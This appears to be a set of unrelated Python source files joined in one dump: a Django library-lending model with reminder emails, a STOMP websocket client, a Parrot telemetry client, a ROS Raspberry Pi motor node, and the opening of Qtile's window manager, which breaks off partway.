('0', 'Sensory Integration'),
('1', 'DVD/Software materials'),
('2', 'Resources for Professionals & Parents'),
('3', 'Couple Relationships'),
('4', 'Resources for Teaching Children/School'),
('5', 'Support for Siblings'),
('6', 'Resources for Older Children, Teens & Adults'),
('a', 'Behavior'),
('7', "Nonfiction/Novels/Children's Books"),
('8', 'Binder/Folder Resources'),
('9', 'FASD'),
)
catagory = models.CharField(max_length=1, choices=cats) #category col in xls
# borrower info
statuses = (
('0', 'Available'),
('1', 'Reservered'),
('2', 'Checked Out'),
)
status = models.CharField(max_length=1, choices=statuses, default="0")
borrower_name = models.CharField(max_length = 60, default='', blank = True,
verbose_name = 'name')
phone = models.CharField(max_length = 10, default='',blank = True)
email = models.CharField(max_length = 50, default='',blank = True)
checkout_date = models.DateTimeField(blank=True, null=True,
verbose_name = "Check Out Appointment")
return_date = models.DateTimeField(blank=True, null=True,
verbose_name = "Return Appointment")
sender = "autism@asagoldenheart.org"
admin_emails = ["autism@asagoldenheart.org",]
def clean(self):
if self.status == '0':
#~ self.checkout_date = self.return_date = ""
self.email = self.phone = self.borrower_name = ""
if self.status == '1' or self.status == '2':
if self.borrower_name == "":
raise ValidationError("Enter a borrower's Name, " +\
"to schedule an appointment")
if self.phone == "" and self.email == "":
raise ValidationError("Enter a phone number or email, " +\
"to schedule an appointment")
if self.status == '1':
try:
if self.checkout_date < datetime.now(utc):
raise TypeError
except TypeError:
raise ValidationError('The checkout date has past,' +\
'please update')
# check for name & contact
self.email_ar() # start up the admin reminder email thread
if not self.email == "":
self.email_cr()
if self.status == '2':
try:
if self.return_date < datetime.now(utc):
raise TypeError
except TypeError:
raise ValidationError('The return date has past, please update')
# check for name & contact
self.email_aco() # start up the admin reminder email thread
if not self.email == "":
self.email_cco()
def email_cr(self):
# send email (perhaps write an email thread)
#~ print "sending client resevered email"
subject = "Checkout Appointment Reminder"
msg = "Dear " + self.borrower_name + ',\n\n' +\
"You have set up an appointment to check out " + self.title + \
". Your appointment is at " + str(self.checkout_date)[11:16] + \
" on " + str(self.checkout_date)[:10] +\
". \nThank you, \n\n The Autism Society of Alaska."
recpient = [self.email]
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
def email_ar(self):
#~ print "sending admin resevered email"
# send email
subject = "[ARDA] Checkout Reminder - ("+ self.borrower_name +')'
msg = self.borrower_name + " has set up an appointment to check out " \
+ self.title + ", the Physical ID is " + str(self.phys_id) +\
". The appointment is at " + str(self.checkout_date)[11:16] + \
" on " + str(self.checkout_date)[:10] + '\n\n'\
"Borrower Contact Info:\n" +\
"Name: " + self.borrower_name +'\n' +\
"Email: " + self.email +'\n' +\
"Phone: " + self.phone +'\n'
recpient = self.admin_emails
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
def email_cco(self):
#~ print "sending client check out email"
# send email
subject = "Return Appointment Reminder"
msg = "Dear " + self.borrower_name + ',\n\n' +\
"You have checked out " + self.title + \
" from The Autism Society of Alaska's Library. " +\
". Your appointment to return the book is at " + \
str(self.return_date)[11:16] + \
" on " + str(self.return_date)[:10] +\
". \nThank you, \n\n The Autism Society of Alaska."
recpient = [self.email]
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
def email_aco(self):
#~ print "sending admin check out email"
# send email
subject = "[ARDA] Return Reminder - ("+ self.borrower_name +')'
msg = self.borrower_name + ' has checked out ' + self.title + \
", the Physincal ID is " + str(self.phys_id) + \
". The appointment to return the book is at " + \
str(self.return_date)[11:16] + \
" on " + str(self.return_date)[:10] + '\n\n'\
"Borrower Contact Info:\n" +\
"Name: " + self.borrower_name +'\n' +\
"Email: " + self.email +'\n' +\
"Phone: " + self.phone +'\n'
recpient = self.admin_emails
send_mail(subject, msg, self.sender,recpient, fail_silently=True)
    class Meta:
        # Human-readable name shown in the Django admin.
        verbose_name = 'Library Item'
# Merged with library item
#~ class Borower(models.Model):
#~ """
#~ borrower database model
#~ """
#~ types= (
#~ ('0', 'Available'),
#~ ('1', 'Reserved'),
#~ ('2', 'Checked Out'),
#~ )
#~ status = models.CharField(max_length=1, choices=types, default="0")
#~
#~
#~ resource = models.ForeignKey(RLibrary)
#~ borrower_name = models.CharField(max_length = 50, blank=True)
#~ phone = models.CharField(max_length = 10)
#~ email = models.CharField(max_length = 50)
#~ checkout_date = models.DateField(blank=True, null=True)
#~ return_date = models.DateField(blank=True, null=True)
class ROnline(Resource):
    """
    Database model for online items (videos, articles, web sites).
    """
    # types of online resources
    types = (
        ('0', 'video'),
        ('1', 'article'),
        ('2', 'web site')
    )
    # which of the categories above this item belongs to
    otype = models.CharField(max_length = 1, choices=types,
                             verbose_name ="type")
    # publication date of the online resource
    date = models.DateField()
    url = models.URLField(blank=True)
    class Meta:
        verbose_name = 'Online Item'
class REvent(Resource):
    """
    Database model for events (fund raisers, meet and greets, etc.).
    """
    date_time = models.DateTimeField()
    location = models.TextField(blank=True)
    archive = models.BooleanField(default = False, verbose_name="Archive Event")

    def clean(self):
        """Validate the event date and sync its browser visibility.

        Raises:
            ValidationError: if the event is in the past and not archived.

        Bug fix: the concatenated error message was missing a space and
        read "...must be inthe future...".
        """
        now = datetime.now(utc)
        self.show_in_browser = True
        if (self.date_time < now) and not self.archive:
            raise ValidationError("The date & time for the event must be in " +
                                  "the future, or the event must be archived")
        if self.archive:
            # Archived events stay in the DB but are hidden from the site.
            self.show_in_browser = False
        return

    class Meta:
        verbose_name = 'Event'
class RService(Resource):
    """
    Database model for services (providers with a physical location).
    """
    address = models.CharField(max_length = 50)
    phone = models.CharField(max_length = 10)
    email = models.CharField(max_length = 50)
    url = models.URLField(blank=True)
    class Meta:
        verbose_name = 'Service'
class SDemo(models.Model):
    """
    Demographic search related item Database model.

    One boolean per demographic bucket, used to filter resources.
    """
    resource = models.ForeignKey(Resource)
    age1to3 = models.BooleanField(default=False, verbose_name= "Age 1-3")
    age3to18 = models.BooleanField(default=False, verbose_name= "Age 3-18")
    age18plus = models.BooleanField(default=False, verbose_name= "Age 18+")
    gender_m = models.BooleanField(default=False, verbose_name= "Male")
    gender_f = models.BooleanField(default=False, verbose_name= "Female")
    class Meta:
        verbose_name_plural = verbose_name = "Demographics"
class SBehaviour(models.Model):
    """
    Behavior search related item Database model.

    One boolean flag per behavior topic, used to filter resources.
    """
    resource = models.ForeignKey(Resource)
    sleep = models.BooleanField(default=False)
    safety_home = models.BooleanField(default=False, verbose_name="Safety Home")
    safety_public = models.BooleanField(default=False,
                                        verbose_name="Safety Public")
    safety_travel = models.BooleanField(default=False,
                                        verbose_name="Safety Travel")
    repetition = models.BooleanField(default=False)
    aggression = models.BooleanField(default=False)
    communication = models.BooleanField(default=False)
    nonverbal = models.BooleanField(default=False)
    sensory = models.BooleanField(default=False)
    meltdown = models.BooleanField(default=False)
    anxiety = models.BooleanField(default=False)
    change = models.BooleanField(default=False)
    nutrition = models.BooleanField(default=False)
    class Meta:
        verbose_name_plural = verbose_name = "Behaviors"
class SDisorder(models.Model):
    """
    Disorder search related item Database model.

    One boolean flag per disorder, used to filter resources.
    """
    resource = models.ForeignKey(Resource)
    asd = models.BooleanField(default=False,
                              verbose_name= "Autism Spectrum Disorder")
    fas = models.BooleanField(default=False,
                              verbose_name= "Fetal Alcohol Syndrome")
    pdd = models.BooleanField(default=False,
                              verbose_name= "Pervasive Developmental Disorder")
    aspergers = models.BooleanField(default=False,
                                    verbose_name= "Asperger Syndrome")
    cdd = models.BooleanField(default=False,
                              verbose_name= "Cognitive Development Disorder")
    class Meta:
        verbose_name_plural = verbose_name = "Disorders"
class SServices(models.Model):
    """
    Service search related item Database model.

    Flags describing what kind of service a resource provides, plus the
    city it serves.
    """
    cities = (
        ('0', 'State Wide'),
        ('1', 'Anchorage'),
        ('2', 'Fairbanks'),
        ('3', 'Juneau'),
        ('4', 'Valdez'),
    )
    # NOTE(review): field naming is inverted vs. the sibling S* models --
    # here the FK is ``resourceLink`` and ``resource`` is a boolean flag.
    resourceLink = models.ForeignKey(Resource)
    diagnostic = models.BooleanField(default=False)
    resource = models.BooleanField(default=False)
    therapy = models.BooleanField(default=False)
    educational = models.BooleanField(default=False)
    referral = models.BooleanField(default=False)
    legal = models.BooleanField(default=False)
    city = models.CharField(max_length = 1, choices=cities)
    class Meta:
        verbose_name_plural = verbose_name = "Service Features"
class SAdditional(models.Model):
    """
    Additional search related item Database model.

    Audience flags used as extra search filters.
    """
    resource = models.ForeignKey(Resource)
    parents = models.BooleanField(default = False,
                                  verbose_name = "For Parents & Professionals")
    relationships = models.BooleanField(default = False,
                                        verbose_name = "Relationships")
    teachers = models.BooleanField(default = False,
                                   verbose_name = "For Teachers")
    sibilings = models.BooleanField(default = False,
                                    verbose_name = "For Siblings")
    teens = models.BooleanField(default = False,
                                verbose_name = "For Teens/Young Adults")
    class Meta:
        verbose_name_plural = verbose_name = "Additional Search options"
|
stomp.py | import websocket
import time
from threading import Thread
# STOMP framing octets (per the STOMP wire protocol)
BYTE = {
    'LF': '\x0A',    # line feed: terminates each frame line
    'NULL': '\x00'   # null octet: terminates a complete frame
}
# Protocol versions offered during CONNECT negotiation
VERSIONS = '1.0,1.1'
class Stomp:
    """High-level STOMP-over-websocket client exposed to users."""

    def __init__(self, host, sockjs=False, wss=True, debug=False):
        """
        Initialize STOMP communication. This is the high level API that is
        exposed to clients.

        Args:
            host: Hostname
            sockjs: True if the STOMP server is sockjs
            wss: True if communication is over SSL
            debug: True to echo connection info / traffic to stdout
        """
        # websocket.enableTrace(True)
        self.debug = debug
        suffix = "" if sockjs is False else "/websocket"
        scheme = "ws://" if wss is False else "wss://"
        self.url = scheme + host + suffix
        if self.debug:
            print('you are connecting to ' + self.url)
        self.dispatcher = Dispatcher(self)
        # subscription registry: destination (str) -> callback (func)
        self.callback_registry = {}

    def setDebug(self, isEnabled):
        """Toggle debug tracing."""
        self.debug = isEnabled

    def connect(self):
        """Connect to the remote STOMP server; block until CONNECTED."""
        self.connected = False
        self.dispatcher.connect()
        # poll until the dispatcher flips the flag on CONNECTED
        while not self.connected:
            time.sleep(1)
        return self.connected

    def subscribe(self, destination, callback):
        """Subscribe to *destination*; *callback* runs per received message."""
        self.callback_registry[destination] = callback
        self.dispatcher.subscribe(destination)

    def send(self, destination, message):
        """Send *message* to *destination*."""
        self.dispatcher.send(destination, message)
class Dispatcher:
    """Handles all websocket network I/O and STOMP frame (un)marshalling.

    Bug fixes vs. the original:
    - header lines are split on the FIRST ':' only (header values such as
      error messages may themselves contain colons);
    - the frame body no longer retains the trailing NULL terminator octet,
      and multi-line bodies are reassembled instead of truncated at the
      first LF.
    """

    def __init__(self, stomp):
        self.stomp = stomp
        self.subId = 1
        self.ws = websocket.WebSocketApp(self.stomp.url)
        # register websocket callbacks
        self.ws.on_open = self._on_open
        self.ws.on_message = self._on_message
        self.ws.on_error = self._on_error
        self.ws.on_close = self._on_close
        self.opened = False
        # run event loop on separate thread
        Thread(target=self.ws.run_forever).start()
        # block until the underlying websocket is open
        while self.opened is False:
            time.sleep(1)

    def _on_message(self, message):
        """
        Executed when a message is received on the websocket.
        """
        if self.stomp.debug:
            print("<<< " + message)
        command, headers, body = self._parse_message(message)
        # if connected, let Stomp know
        if command == "CONNECTED":
            self.stomp.connected = True
        # if message received, call appropriate callback
        if command == "MESSAGE":
            self.stomp.callback_registry[headers['destination']](body)

    def _on_error(self, error):
        """
        Executed when the websocket connection errors out.
        """
        print(error)

    def _on_close(self):
        """
        Executed when the websocket connection is closed.
        """
        print("### closed ###")

    def _on_open(self):
        """
        Executed when the websocket connection is opened.
        """
        self.opened = True
        print("### ws connected ###")

    def _transmit(self, command, headers, msg=None):
        """
        Marshalls and transmits the frame.
        """
        # Construct the frame
        lines = []
        lines.append(command + BYTE['LF'])
        # add headers
        for key in headers:
            lines.append(key + ":" + headers[key] + BYTE['LF'])
        lines.append(BYTE['LF'])
        # add message, if any
        if msg is not None:
            lines.append(msg)
        # terminate with null octet
        lines.append(BYTE['NULL'])
        frame = ''.join(lines)
        # transmit over ws
        if self.stomp.debug:
            print(">>>" + frame)
        self.ws.send(frame)

    def _parse_message(self, frame):
        """
        Unmarshall a raw STOMP frame.

        Args:
            frame: raw frame string

        Returns:
            (command, headers, body); body is None when the frame has no
            body.
        """
        lines = frame.split(BYTE['LF'])
        command = lines[0].strip()
        headers = {}
        # headers run until the first blank line
        i = 1
        while lines[i] != '':
            # split on the first ':' only -- values may contain colons
            (key, value) = lines[i].split(':', 1)
            headers[key] = value
            i += 1
        # body is everything after the blank line, minus the NULL octet
        body = BYTE['LF'].join(lines[i + 1:]).rstrip(BYTE['NULL'])
        body = body if body else None
        return command, headers, body

    def connect(self):
        """
        Transmit a CONNECT frame.
        """
        headers = {}
        headers['accept-version'] = VERSIONS
        headers['heart-beat'] = '10000,10000'
        self._transmit('CONNECT', headers)

    def subscribe(self, destination):
        """
        Transmit a SUBSCRIBE frame with a fresh subscription id.
        """
        headers = {}
        headers['id'] = 'sub-%d' % (self.subId)
        self.subId += 1
        headers['ack'] = 'client'
        headers['destination'] = destination
        self._transmit('SUBSCRIBE', headers)

    def send(self, destination, message):
        """
        Transmit a SEND frame.
        """
        headers = {}
        headers['destination'] = destination
        headers['content-length'] = str(len(message))
        self._transmit('SEND', headers, msg=message)
|
odd.py | import sys
import logging
import os
import optparse
import signal
import threading
# Location of the Parrot GroundSDK "common" checkout under $HOME; libpomp
# and the telemetry tools are imported from there via the sys.path
# additions below.
PARROT_COMMON = "/Documents/parrot/groundsdk/packages/common"
POMP_LIB = os.path.expanduser("~") + PARROT_COMMON + "/libpomp/python"
TELEMETRYD_LIB = os.path.expanduser("~") + PARROT_COMMON + "/telemetry/tools"
sys.path.append(POMP_LIB)
sys.path.append(TELEMETRYD_LIB)
import pomp
from tlmb_parser import TlmbSection, TlmbSample
GNDCTRL_PROTOCOL_VERSION = 1
# Ground-control protocol message ids (requests, responses, notifications)
GNDCTRL_MSG_CONN_REQ = 1
GNDCTRL_MSG_CONN_RESP = 2
GNDCTRL_MSG_SUBSCRIBE_REQ = 3
GNDCTRL_MSG_SUBSCRIBE_RESP = 4
GNDCTRL_MSG_UNSUBSCRIBE_REQ = 5
GNDCTRL_MSG_UNSUBSCRIBE_RESP = 6
GNDCTRL_MSG_SECTION_ADDED = 7
GNDCTRL_MSG_SECTION_REMOVED = 8
GNDCTRL_MSG_SECTION_CHANGED = 9
GNDCTRL_MSG_SECTION_SAMPLE = 10
# Rates requested from the daemon -- values look like microseconds
# (200 * 1000 = 200ms) -- TODO confirm against libpomp/telemetryd docs.
SAMPLE_RATE = 200 * 1000  # Samples every 200ms
MSG_RATE = 1000 * 1000  # Message every 1s
#===============================================================================
#===============================================================================
_USAGE = (
"usage: %prog [<options>] <ctrladdr> <dataport>\n"
"Connect to a ishtar server\n"
"\n"
" <options>: see below\n"
" <ctrladdr> : control address\n"
" <dataport> : data port\n"
"\n"
"<ctrladdr> format:\n"
" inet:<addr>:<port>\n"
" inet6:<addr>:<port>\n"
" unix:<path>\n"
" unix:@<name>\n"
)
#===============================================================================
#===============================================================================
class GndCtrlItf(object):
    """Ground-control telemetry interface.

    Maintains a control connection (pomp client) plus a bound data
    channel, tracks the set of telemetry sections published by the
    daemon, and forwards decoded samples to *app*.

    Bug fix: on control-channel disconnect, the section registry is now
    cleared on the interface (``self.itf.sections``); the original
    assigned ``self.sections`` on the event handler, which has no such
    attribute, so stale sections survived a reconnect.
    """

    def __init__(self, app, name, ctrlAddr, dataPort):
        self.app = app
        self.name = name
        self.ctrlAddr = ctrlAddr
        self.dataPort = dataPort
        self.ctrlCtx = pomp.Context(GndCtrlItf._CtrlEventHandler(self))
        self.dataCtx = pomp.Context(GndCtrlItf._DataEventHandler(self))
        # sectionId -> TlmbSection
        self.sections = {}

    def start(self):
        """Connect the control channel and bind the data channel."""
        (family, addr) = pomp.parseAddr(self.ctrlAddr)
        self.ctrlCtx.connect(family, addr)
        (family, addr) = pomp.parseAddr("inet:0.0.0.0:%u" % self.dataPort)
        self.dataCtx.bind(family, addr)

    def stop(self):
        """Tear down both pomp contexts."""
        self.ctrlCtx.stop()
        self.dataCtx.stop()

    def recvCtrlMsg(self, msg):
        """Dispatch one message received on the control channel."""
        if msg.msgid == GNDCTRL_MSG_CONN_RESP:
            dec = pomp.Decoder()
            dec.init(msg)
            status = dec.readU32()
            count = dec.readU32()
            logging.info("Connected: status=%d", status)
            # remaining payload is `count` key/value property pairs
            for _ in range(0, count):
                key = dec.readStr()
                val = dec.readStr()
                logging.info("%s='%s'", key, val)
        elif msg.msgid == GNDCTRL_MSG_SECTION_ADDED:
            (sectionId, sectionName) = msg.read("%u%s")
            section = TlmbSection(sectionId, sectionName)
            self.sections[sectionId] = section
            logging.info("Section added: %s(%d)", sectionName, sectionId)
        elif msg.msgid == GNDCTRL_MSG_SECTION_REMOVED:
            (sectionId, ) = msg.read("%u")
            section = self.sections.get(sectionId, None)
            if section is not None:
                logging.info("Section removed: %s(%d)", section.sectionName, sectionId)
                self.app.sectionRemoved(section.sectionName)
                del self.sections[sectionId]
        elif msg.msgid == GNDCTRL_MSG_SECTION_CHANGED:
            (sectionId, buf) = msg.read("%u%p")
            section = self.sections.get(sectionId, None)
            if section is not None:
                # re-read the header: variable layout may have changed
                newSection = TlmbSection(sectionId, section.sectionName)
                newSection.readHeader(buf)
                logging.info("Section changed: %s(%d)", section.sectionName, sectionId)
                self.sections[sectionId] = newSection
        elif msg.msgid == GNDCTRL_MSG_SECTION_SAMPLE:
            # Only if client is configured to receive samples on the control channel
            (sectionId, sec, nsec, buf) = msg.read("%u%u%u%p")
            self.recvSample(sectionId, (sec, nsec), buf)

    def recvDataMsg(self, msg):
        """Dispatch one message received on the data channel."""
        if msg.msgid == GNDCTRL_MSG_SECTION_SAMPLE:
            (sectionId, sec, nsec, buf) = msg.read("%u%u%u%p")
            self.recvSample(sectionId, (sec, nsec), buf)

    def recvSample(self, sectionId, timestamp, buf):
        """Slice one sample buffer into per-variable chunks for the app."""
        section = self.sections.get(sectionId, None)
        if section is None:
            return
        logging.debug("Sample: %s(%d) %d.%06d", section.sectionName, sectionId,
                      timestamp[0], timestamp[1] // 1000)
        varOff = 0
        for varId in range(0, len(section.varDescs)):
            varDesc = section.varDescs[varId]
            varLen = varDesc.getTotalSize()
            # stop on a short/truncated buffer
            if varOff + varLen > len(buf):
                break
            varBuf = buf[varOff:varOff+varLen]
            self.app.sample(sectionId, timestamp, varId, varDesc, varBuf)
            varOff += varLen

    class _CtrlEventHandler(pomp.EventHandler):
        """pomp event handler for the control channel."""
        def __init__(self, itf):
            self.itf = itf

        def onConnected(self, ctx, conn):
            # Send connection request
            conn.send(GNDCTRL_MSG_CONN_REQ, "%u%s%u%u%u",
                      GNDCTRL_PROTOCOL_VERSION, self.itf.name, self.itf.dataPort,
                      SAMPLE_RATE, MSG_RATE)

        def onDisconnected(self, ctx, conn):
            # Clear internal state (on the interface, not this handler).
            logging.info("Disconnected")
            self.itf.sections = {}

        def recvMessage(self, ctx, conn, msg):
            self.itf.recvCtrlMsg(msg)

    class _DataEventHandler(pomp.EventHandler):
        """pomp event handler for the data channel."""
        def __init__(self, itf):
            self.itf = itf

        def onConnected(self, ctx, conn):
            pass

        def onDisconnected(self, ctx, conn):
            pass

        def recvMessage(self, ctx, conn, msg):
            self.itf.recvDataMsg(msg)
class App():
    """Minimal telemetry client: pumps the pomp loop on a worker thread
    and prints every decoded sample it receives."""
    def __init__(self, args):
        self.sock_family = None
        self.sock_addr = None
        self.running = False
        self.thread = None
        # args = [control address string, data port]
        self.itf = GndCtrlItf(self, "example", args[0], int(args[1]))
        # stop the worker loop cleanly on Ctrl-C / SIGTERM
        signal.signal(signal.SIGINT,
                      lambda signal, frame: self._signal_handler())
        signal.signal(signal.SIGTERM,
                      lambda signal, frame: self._signal_handler())
    def _signal_handler(self):
        # only flips the flag; the worker loop notices and exits
        self.running = False
    def __del__(self):
        # NOTE(review): stopping/joining a thread from __del__ is fragile
        # (interpreter teardown order) -- confirm this path is intended.
        if self.running:
            self.stop()
    def start(self):
        """Start the worker thread that runs the pomp event loop."""
        self.running = True
        self.thread = threading.Thread(target=self.worker)
        self.thread.start()
    def stop(self):
        """Stop the loop and wait for the worker thread to exit."""
        self.running = False
        self.thread.join()
    def worker(self):
        """Worker thread body: run the pomp loop until stopped."""
        # setup loop for main thread
        pomp.looper.prepareLoop()
        # create pomp context
        self.itf.start()
        # run main loop
        while self.running:
            pomp.looper.stepLoop(maxMsg=1, timeout=1)
        # destroy pomp context
        self.itf.stop()
    def sectionRemoved(self, sectionName):
        # GndCtrlItf callback; nothing to do in this example app
        pass
    def sample(self, sectionId, timestamp, varId, varDesc, buf):
        # GndCtrlItf callback: dump each decoded sample to stdout
        print(sectionId, timestamp, varId, varDesc, buf)
#===============================================================================
#===============================================================================
def parseArgs():
    """Parse the command line; expects exactly <ctrladdr> <dataport>."""
    parser = optparse.OptionParser(usage=_USAGE)
    # the two flags share everything but name/help; declare them in one go
    for short_opt, long_opt, dest, help_txt in (
            ("-q", "--quiet", "quiet", "be quiet"),
            ("-v", "--verbose", "verbose", "verbose output")):
        parser.add_option(short_opt, long_opt,
                          dest=dest,
                          action="store_true",
                          default=False,
                          help=help_txt)
    (options, args) = parser.parse_args()
    if len(args) != 2:
        parser.error("Bad number or arguments")
    return (options, args)
#===============================================================================
#===============================================================================
class DefOpts:
    """Stand-in for parseArgs() options: neither quiet nor verbose."""
    def __init__(self):
        self.verbose = False
        self.quiet = False
def setupLog(options):
    """Configure root logging with single-letter level names.

    *options* must expose boolean ``quiet`` and ``verbose`` attributes.
    """
    logging.basicConfig(
        level=logging.INFO,
        format="[%(levelname)s][%(asctime)s] %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
        stream=sys.stderr)
    # compact one-letter names for each standard level
    for level, letter in ((logging.CRITICAL, "C"), (logging.ERROR, "E"),
                          (logging.WARNING, "W"), (logging.INFO, "I"),
                          (logging.DEBUG, "D")):
        logging.addLevelName(level, letter)
    # Setup log level from the parsed options
    if options.quiet:
        logging.getLogger().setLevel(logging.CRITICAL)
    elif options.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
#===============================================================================
#===============================================================================
if __name__ == "__main__":
    # (options, args) = parseArgs()
    # hard-coded control address and data port for this example
    args = ["inet:127.0.0.1:9060", 5000]
    setupLog(DefOpts())
    try:
        app = App(args)
        app.start()
    except KeyboardInterrupt:
        # Bug fix: the original called ``root.destroy()`` -- ``root`` (a
        # leftover Tk reference) is undefined here and raised NameError.
        sys.exit(0)
|
motor.py | #! /usr/bin/env python
import os
from multiprocessing import Process, Pipe
import rospy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
import RPi.GPIO as GPIO
import time
# RPI 3 PWM motor pins
# BOARD-numbered GPIO pins, one forward/backward pair per wheel.
LEFT_FORW = 12
LEFT_BACK = 32
RIGHT_FORW = 33
RIGHT_BACK = 35
def twist2velocity_cb(twist, args):
    """
    Ros topic cmd_vel subscription callback.

    Converts a Twist into differential [left, right] wheel speeds and
    forwards them to the motor process through a pipe.

    @param twist: ROS topic twist
    @param args: subscriber callback args tuple; args[0] is the write end
        of the pipe to the motor driver process
    """
    # get process pipe connection
    ros_write_conn = args[0]
    # logging
    log_txt = "%s received -> Linear: %s Angular: %s\r" % (rospy.get_caller_id(), twist.linear, twist.angular)
    log_txt = log_txt.replace('\n', ' ')
    rospy.loginfo(log_txt, logger_name="motor_node_logger")
    # convert twist msg to motor velocity
    # NOTE(review): 0.19 is presumably related to the wheel separation
    # (meters) -- confirm against the robot's geometry.
    if twist.angular.z == 0:
        # pure translation: both wheels at the linear speed
        speed_left = twist.linear.x
        speed_right = speed_left
    elif twist.angular.z != 0 and twist.linear.x == 0:
        # pure rotation: wheels spin in opposite directions
        speed_right = twist.angular.z * 0.19
        speed_left = - speed_right
    else:
        # arc: superpose translation and rotation components
        speed_angular = twist.angular.z * 0.19
        speed_left = twist.linear.x - speed_angular
        speed_right = twist.linear.x + speed_angular
    # send motor velocities to motor process
    ros_write_conn.send([speed_left, speed_right])
def motor_driver_proc(motor_read_conn):
    """
    Motor actuation worker process.

    Blocks on the pipe for [speed_left, speed_right] pairs (fractions of
    full speed), converts them to PWM duty cycles (x100) and drives the
    GPIO pins until the next command arrives.

    Bug fix: the left channel's duty cycle was clamped against the
    *right* speed (``abs(s_left) if abs(s_right) < 100 else 100``); each
    channel now clamps against its own magnitude.

    @param motor_read_conn: read end of a multiprocessing Pipe
    """
    # init conn once
    s_left, s_right = motor_read_conn.recv()
    s_left = s_left * 100
    s_right = s_right * 100
    # spin worker
    while True:
        try:
            # pick the direction pin per wheel (skip a wheel at speed 0)
            if s_left == 0: pass
            elif s_left > 0: l_pin = LEFT_FORW
            else: l_pin = LEFT_BACK
            if s_right == 0: pass
            elif s_right > 0: r_pin = RIGHT_FORW
            else: r_pin = RIGHT_BACK
            # GPIO setup
            GPIO.setwarnings(False)
            GPIO.setmode(GPIO.BOARD)
            if s_left != 0: GPIO.setup(l_pin, GPIO.OUT)
            if s_right != 0: GPIO.setup(r_pin, GPIO.OUT)
            if s_left != 0: l_pwm = GPIO.PWM(l_pin, 100)
            if s_right != 0: r_pwm = GPIO.PWM(r_pin, 100)
            # actuate: duty cycle clamped to [0, 100] per channel
            if s_left != 0: l_pwm.start(min(abs(s_left), 100))
            if s_right != 0: r_pwm.start(min(abs(s_right), 100))
            # block here until a new command arrives
            s_left_new, s_right_new = motor_read_conn.recv()
            rospy.loginfo("TWIST SPEED: %s, %s\r" % (s_left_new, s_right_new))
            s_left_new = s_left_new * 100
            s_right_new = s_right_new * 100
            # stop old cmd execution
            if s_left != 0: l_pwm.stop()
            if s_right != 0: r_pwm.stop()
            # update
            s_left = s_left_new
            s_right = s_right_new
        except Exception as ex:
            rospy.logerr("%s\r" % ex)
        finally:
            # reset pin in/out state
            GPIO.cleanup()
            # yield thread
            time.sleep(0)
def init_ros_node():
    """
    Motor node main method.

    Spawns the motor driver worker process, then registers as a ROS
    subscriber on ``cmd_vel`` and spins until shutdown.
    """
    # load startup node logo
    # NOTE(review): the path is relative to the current working directory;
    # this fails if the node is launched from elsewhere.
    with open('./name_ascii.txt', 'r') as file:
        ascii_art_str = file.read()
    print("\033[1;34m" + ascii_art_str + "\033[0m")
    # init motor driver process
    motor_read_conn, ros_write_conn = Pipe()
    pm = Process(target=motor_driver_proc, args=(motor_read_conn,))
    pm.start()
    # init ros subscriber node
    rospy.init_node('motor_node', anonymous=False)
    rospy.Subscriber("cmd_vel", Twist, twist2velocity_cb, (ros_write_conn,))
    rospy.spin()
    # join worker -- only reached after ROS shutdown unwinds spin()
    ros_write_conn.close()
    motor_read_conn.close()
    pm.join()
if __name__ == '__main__':
    # script entry point: bring up the motor node
    init_ros_node()
|
manager.py | # vim: tabstop=4 shiftwidth=4 expandtab
# Copyright (c) 2008, Aldo Cortesi. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from libqtile.log_utils import init_log
from libqtile.dgroups import DGroups
from xcffib.xproto import EventMask, WindowError, AccessError, DrawableError
import atexit
import imp
import logging
import os
import os.path
import pickle
import shlex
import signal
import sys
import traceback
import threading
import xcffib
import xcffib.xinerama
import xcffib.xproto
import six
from six.moves import asyncio
from .config import Drag, Click, Screen, Match, Rule
from .group import _Group
from .state import QtileState
from .utils import QtileError
from .widget.base import _Widget, deprecated
from . import command
from . import hook
from . import utils
from . import window
from . import xcbq
class Qtile(command.CommandObject):
"""
This object is the __root__ of the command graph.
"""
    def __init__(self, config,
                 displayName=None, fname=None, no_spawn=False, log=None,
                 state=None):
        """Connect to the X server and bring up all window-manager state.

        config: user configuration object; displayName: X display (falls
        back to $DISPLAY); fname: command-socket path; no_spawn: set on
        restart to skip the one-time startup hook; state: pickled
        QtileState string to restore.
        """
        # Build logger kwargs only from config attributes that exist.
        logkwargs = {}
        if hasattr(config, "log_level"):
            logkwargs["log_level"] = config.log_level
        if hasattr(config, "log_path"):
            logkwargs["log_path"] = config.log_path
        self.log = log or init_log(**logkwargs)
        logging.getLogger('asyncio').setLevel(logging.CRITICAL)
        self.no_spawn = no_spawn
        self._eventloop = asyncio.get_event_loop()
        if not displayName:
            displayName = os.environ.get("DISPLAY")
            if not displayName:
                raise QtileError("No DISPLAY set.")
        if not fname:
            # Dots might appear in the host part of the display name
            # during remote X sessions. Let's strip the host part first.
            displayNum = displayName.partition(":")[2]
            if "." not in displayNum:
                displayName = displayName + ".0"
            fname = command.find_sockfile(displayName)
        self.conn = xcbq.Connection(displayName)
        self.config = config
        self.fname = fname
        hook.init(self)
        # wid -> window, name -> widget, name -> group lookup tables
        self.windowMap = {}
        self.widgetMap = {}
        self.groupMap = {}
        self.groups = []
        self.keyMap = {}
        # Find the modifier mask for the numlock key, if there is one:
